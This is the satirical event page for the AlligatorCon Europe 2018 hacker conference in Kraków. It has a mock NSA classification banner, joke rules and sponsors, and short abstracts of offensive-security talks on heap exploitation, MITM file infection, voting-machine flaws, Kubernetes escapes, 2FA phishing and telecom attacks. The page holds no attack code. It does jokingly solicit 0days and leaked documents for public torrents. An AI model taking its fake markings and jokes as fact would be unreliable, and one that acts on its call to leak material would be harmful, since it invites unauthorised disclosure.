TOP SECRET//SI//REL USA, FVEY National Security Agency/Central Security Service Information Paper 0x4849205448455245 Alligator Europe Security Conference 2018 31 August & 1 September @ Areszt śledczy - Kraków, Poland aka PiSland

-= [ AlligatorCon Europe 2018] =-
TOP SECRET - FOR YOUR EYES ONLY - TOP SECRET - FOR YOUR EYES ONLY - TOP SECRET - FOR YOUR EYES ONLY - TOP SECRET - FOR YOUR EYES ONLY - TOP SECRET - FOR YOUR EYES ONLY - TOP SECRET - FOR YOUR EYES ONLY - TOP SECRET - FOR YOUR EYES ONLY - TOP SECRET - FOR YOUR EYES ONLY - TOP SECRET - FOR YOUR EYES ONLY - TOP SECRET - FOR YOUR EYES ONLY - TOP SECRET - FOR YOUR EYES ONLY - TOP SECRET - FOR YOUR EYES ONLY - TOP SECRET - FOR YOUR EYES ONLY - TOP SECRET - FOR YOUR EYES ONLY - TOP SECRET - FOR YOUR EYES ONLY - TOP SECRET - FOR YOUR EYES ONLY - DID YOU REALLY WAIT THIS LONG JUST TO SEE IF THE TEXT CHANGED? WELL CONGRATULATIONS, IT DOES, AND ONLY *YOU* KNOW ABOUT IT! The Alligators roam the streets of Kraków again! Just like every year, we changed the venue and date. Why? Because why the hell not. At least you know you'll never be bored with us. Some things never change though. Entry is and always will be 100% free. It's invite only, but hacking the registration web page still counts as a valid way to get an invite. We do not have sponsors or any sponsored content during the talks. The venue address and the location of all parties will be revealed at the last possible moment only to those who were invited, and you should not reveal it to anyone else. We do welcome donations to keep the party going. All currencies are accepted, fiat or virtual. 0days and leaked documents are welcome as well, if you drop us any they will be shared on the torrents just for the lulz. As a last minute surprise, we are also having a workshop on Thursday, one day before the event. It's a FIFO queue (first come, first serve) so if you want to attend make sure to send us an email ASAP.
[--- Rules of the Alligator
  • You do not talk about Alligator.
  • You do not talk about Alligator.
  • If this is your first night at Alligator, you have to hack.
  • You can present using your IRC nick, Twitter handle, whatever the hell you want but never with your real name. Remember what Joey said, you don't have an identity until you have a handle.
  • No cameras unless explicitly allowed by everyone in the picture, and no videos of the talks. There's no need to make it easy for the spooks.
  • The contents or even the title of some talks may not be public, on request of the speaker. Never discuss them after Alligator ends, or you'll be banned forever. And we mean it.

    Remember, kids: what happens in Kraków, stays in Kraków!
[--- Registration
If you've already received your invite token, you can redeem it here. The email address MUST be valid, but we recommend creating a new one, NOT tied to your identity, just for this. Good OPSEC is proactive, not retroactive!
Email: Token:
If you're invited and haven't got your token, drop us an email at and let us know.
[--- I am Jack's list of talks

Hours of MS Paint went into this image.

Title: Lightning Talks Speaker: .* Country of origin: .* A slot will be reserved for lightning talks. Just get up on stage and talk about whatever you want. Worst that can happen we throw pierogi at you. [--- Title: Heap, heap, hurra! ... or maybe not! Speaker: @barbieauglend Country of origin: 🌍 The Internet The modern world depends and rely on the security (and safety!) of software. To protect privacy, intellectual property, customer data and even national security are goals for most of us. Analysis tools can help us to get new insights that can be used to secure software and hardware by identifying vulnerabilities and issues, before they cause harm downstream. The automatic exploit generation is an old challenge in the industry that is not totally solved - in fact, we are far away from it, as Julien Vanegue stated in May this year. Furthermore, AEG is limited right now to stack-based buffer overflows and format string exploits as the semantic information about user bytes in memory is not available. In this talk I am showing a proof of concept for automated heap exploit generation on an x86 architecture, using symbolic execution and SMT solvers. [--- Title: Infecting files on-the-fly (OTF) Speaker: Fuego Fatuo Country of origin: 🇪🇸 Fariñaland Infecting files during a MITM attack is a common way of malware infection vector. Exists several tools to do it, free tools, commercial tools even leaked tools. Several drawbacks exists with this tools like Not real on the fly infection, only PE files infection. I will present some techniques to avoid that drawbacks. The talk will not only be PE centric, I will talk about OTF infection of other file types. The topics covered are state of art, reverse engineer file types, ways to infect and protocol abusing. I will also use a Open Source tool I developed for these tasks. [--- Title: The Return of Software Vulnerabilities in the Brazilian Voting Machine Speaker: TheSpider Country of origin: 🇧🇷 Huehueland This presentation shows a detailed and up-to-date security analysis of the voting software used in Brazilian elections. It is based on results obtained by the authors in a recent hacking challenge organized by the Superior Electoral Court (SEC), the national electoral authority. During the event, multiple serious vulnerabilities were detected in the voting software, which when combined compromised the main security properties of the equipment, namely ballot secrecy and software integrity. The insecure storage of cryptographic keys, hard-coded directly in source code and shared among all 500,000 machines, allowed full content inspection of the software installation memory cards, after which two shared libraries missing authentication signatures were detected. Injecting code in those libraries opened the possibility of executing arbitrary code in the equipment, violating the integrity of the running software. We trace the history of the vulnerabilities to a previous security analysis, providing some perspective about how the system evolved in the past 5 years. [--- Title: Attacking Kubernetes Speaker: "The Donald" @ White House Country of origin: 🇺🇸 Mordor This talks' focus lays on a popular containerization tool called Kubernetes. Common implementations of Kubernetes are not secure by default and a lot of information about hardening is not known to the public. Since version 1.7 the security level has increased and common security misconfigurations have been mitigated. During this talk it will be demonstrated what happens if these mitigations are not applied and how to abuse them. The talk will be about both securing and attacking the platform and could be considered a 'purple team' talk. Multiple live demos are planned, most of them ending in a guest-to-host escape and a root shell. [--- Title: I'm gonna get your crypto exchange down Speaker: Doctore Country of origin: 🇵🇱 PiSland Crypto takes over the world. So many coins (mostly shitcoins but who cares?), so many exchanges and wallets online. As someone said “You can either rob a conventional bank or a crypto currency company. Both have millions, but unlike traditional banks, cryptocurrency companies are startups with only 20 people.” Hundreds of billions of dollars are lying on the street to pick them up. And you on the other side who wants to rule them all! This talk will show you how to start with easy pentest of cloud crypto wallet dedicated for particular coin and end up with shutting down the crypto exchange with the GDPR in the background. No demo because it’s down :( [--- Title: Catch me if you can. I’m behind 7 proxies. Speaker: kukabeludo Country of origin: 🇧🇷 Huehueland Privacy is a dream far away to be a reality in our life. But how to reduce the impacts of surveillance? The adversaries’ ability to compromise TOR RELAYS is mining our trust in anonymous networks such as TOR but this war is not totally lost. How to defeat the TOR compromised relays? The ability of read all your text messages including but not limited to emails, SMS messages, Telegram, Whatsapp, Signal conversations and let’s not forget about all your phone calls, gives the adversary total control over your communication channels. What about the alternatives? Giving a special attention to the problems related with the TOR network. This presentation will analyze some de-anonymization techniques which allowed surveillance agencies to identify TOR users. I will propose an approach to invalidate those techniques. The idea is to reduce and difficult powerful attacks such data correlation attacks, even considering that your adversary has a full compromised TOR RELAYs and your sensitive data is prone to pass by those compromised relays. As a bonus I will present a tool which solves the principal TOR NETWORK issues like:
  • Stability: TOR is considered an unstable network. The packet loss is high and seems that it’s an eternal problem for such kind of anonymous network. How to solve this issue?
  • Speed: The anonymity behind the TOR network is based on the capability of this network in make your connection hop a couple of times before reach the final destination. Those hops can happen in countries from different continents and this slow down the speed of TOR NETWORK. My solution allows you to watch movies in High Resolution in YOUTUBE, and use TOR network for everything without fell the pain of use a considered “slow network”.
  • Compromised Relays: The number of TOR compromised relays is increasing. The adversary can intercept your data even inside the anonymous network. This tools reduces the chances of a successful data correlation.
In fact, how to transport sensitive data is only one item from your list of concerns. We will see how to reduce the chances of a successful attack against 2FA mechanism, Passwords, Encryption, and see simple solutions to solve old but huge issues like how to manager your passwords. [--- Title: Phishing 2FA Tokens with Evilginx2 Speaker: @mrgretzky Country of origin: 🇵🇱 PiSland Phishing has been the most popular attack vector since forever and it is still in great shape. In order to make attacker's life harder, companies implement various forms of two-factor authentication, for users, as an extra layer of protection for their accounts. This deters bad guys who phish only for login credentials, but not those who are also able to intercept session tokens. In my presentation I will show off Evilginx2 to debunk the myth that 2FA provides rock-solid defense against phishing attacks. Brace yourselves as there will be live demos of haxxx and much excitement coming from account pwnage. [--- Title: The Hitch-hacker's guide to (gain access to) the internal network Speaker: @adon90 & @rockajansky Country of origin: 🇪🇸 Fariñaland TL;DR: We will present several procedures to obtain access to the internal network while attacking from the Internet that have been successfully carried out in real case scenarios during Red Team exercises. The attack vectors were the exploitation of divers web application vulnerabilities (one of them in a SAP, a combination of vulnerabilities that led to RCE) and also different ways to achieve RCE from an Office document, some of them Macro-less, for phishing & fun. Technical stuff inside guaranteed. Pentesting may be a boring adventure sometimes. But other times, a little thread is found in the process and pulling it, it leads to satisfacting exploitations that end allowing you access beyond the external perimeter. In this talk several cases will be detailed, including one performed in a SAP asset by modifying an exploit for a vulnerability that was supposed to be present only in the authenticated part of the application...but it wasn't needed any login. But as everyone knows, human factor usually is the weakest link of the chain, and that attack vector could be an easier way to reach the internal network. Two milestones during a Red Team exercise were enough motivation to research about RCE from Word documents for Phishing campaigns: access to an SMTP Server through a Path Traversal vulnerability plus obtaining a couple of valid credentials for email accounts of employees by a Brute Force attack against an OWA Exchange Server. Also, we will discuss lightly about Windows LOLbins used for RCE during tests, combined with VBS scripts, XML, Powershell commands, etc. We are still doing some research about that and responses from AVs. [--- Title: Compile-time Memory Corruption Mitigations: Current State of Affairs Speaker: ad Country of origin: 🇵🇱 PiSland Memory corruption mitigations are an active area of research for more than a decade now, both compile-time and run-time. In this talk we will take a look for the current landscape of the former (compile-time) for mainstream compilers. We will dig into details and read up some assembly which will help us understand all the "Why's", "How's", and "When's". [--- Title: Making the USD Speaker: buherator Country of origin: 🇭🇺 Not Romania Surprise warez! If you want to know more, you'll have to be here! [--- Title: "Bad signals - weaponize 2G, 3G and 4G roaming network attacks Speaker: c0decafe Country of origin: 🇩🇪 We didn't dare to make the obvious joke about this one Weaknesses of SS7 Roaming Networks are well known – but what about the Diameter interfaces coming up at the moment? Diameter is and will be used for roaming connections of LTE/LTE-A mobile networks - a new architecture, and a new implementation. But still, one remains the same: it is a AAA protocol designed for trusted environments - roaming interconnection interfaces between providers. As we know from the past, it is possible to get access to such networks, as you can simply buy access if you spend enough money; as typical attackers in such environments are fraudsters or agencies, they definitely will. Therefore, securing these interface and assessing the infrastructure components and its configuration is very important. In our talk, we will explain not only how Diameter-based networks work and which messages and functions exit, but also which of them can be abused by attackers. Typical attacks are information leaks about the environment, but also attacks against the authentication and encryption of customers. These information can be used for interception of mobile data/calls, but also to establish new business models of fraud. To demonstrate such attacks, we developed a testing framework covering information gathering, mobile phone tracking, denial of service attacks, pay fraud, and interception of data. The framework will be released during our talk and will enable providers and security companies to assess a telco's diameter network configuration and demonstrate what can happen if no proper security measures are applied. We also will give an outlook on how a provider can protect from such kind of attacks.
[--- I am Jack's list of workshops
Title: BLE security workshop Speaker: smartlockpicking Country of origin: 🇵🇱 PiSland In this workshop you will get familiar with the basics of BLE security. We will work on a dedicated, readily available BLE hardware nRF devkit device. In a minutes you will turn into embedded developer and learn how to program your own BLE device yourself, using a free web interface and ready templates. Next, from attacker's perspective, we will cover among others: sniffing, spoofing, MITM, replay and relay. Having enough time, we will play with a collection of vulneraBLE smart locks, sex toys and other devices. The takeaway hardware included will allow you to experiment and repeat the exercises later at home. The hardware pack includes:
  • nRF BLE devkit that can be flashed as a BLE RF sniffer, or a BLE device to attack
  • ST-Link debugger for flashing the devkit firmware
  • 2xBLE USB dongles
Please bring:
  • contemporary laptop that can run Kali Linux in VM (like 4 GB RAM, 20G disk space), with VM software of your choice installed (virtualbox or vmware), and at least 2 USB ports available
  • smartphone with BLE support, preferably Android (at least 4.3), or iPhone (at least 4s)
  • if you have Raspberry Pi 3, you can bring it too
  • you can also bring your own BLE devices
[--- Life insurance pays off triple if you die on a conference trip
The recommended place for your stay in Kraków is the 5 star hotel Areszt Śledczy Kraków-Podgórze. Just knock on the door, tell them all about your hacking feats, and you'll find nice people who will be more than happy to let you in - for free! With some luck you can even score a presidential suite if you are bald and dressed in sportswear. Alternatively, here are a few -possibly more comfortable- venues you can try out: If you're on a budget, Greg & Tom hostel at Ul. Florianska is quite decent, centrally-located and has a nice bar too. Additionally, this city has a really amazing CouchSurfing community that you should definitely reach out to. You're also welcome to bring a sleeping bag and crash on a friendly local hacker's home, a popular choice of Alligator attendees every year. Transport arrangements are prepared for the occasion in the form of a rusty van with the words FREE CANDY spray painted on the side and the picture of a funny bear you may have seen on 4chan before. Trust the nice man with the moustache, he'll take you where you want to go.

Seems legit.

There are also the 208, 292 and 902 buses from the Kraków airport to the city center as well as a train to the main station, or you can alternatively fly to Warsaw or Katowice and go from there to Kraków by train (it's sometimes cheaper). But there's no free candy in those.
[--- We are the all singing, all dancing crap of the infosec world
The venerable Organizing Committee for this year will be:
  • Kurwa Malpka & Count Crapula, the original chaos monkeys
  • Xava Kosmosach on web design
  • Santaplix @ Hackerstrip on original artwork
  • Toxic Avenger as our BOFH
  • Donald Trump on motivational speeches
  • Shia LaBeuf as our personal life coach
  • ...and always with us, Our Lord Satan whom we praise
[--- Sponsors
This event is proudly sponsored by: Soplica Vodka, Paper Street Soap Company, The George Soros Foundation, Russian Ministry of Fake News and Propaganda, Lifetime President of China Xi Jinping, His Majesty King T'Challa of Wakanda, and many others who prefer to remain anonymous but the NSA already knows who you are. No, seriously. They know everything. Run. Run for your lives. This year we will be missing the iconic old dude of Kazimierz, Mikołaj. May you roam the bars of Infinity now, old pal.

0x4849205448455245 [EOF]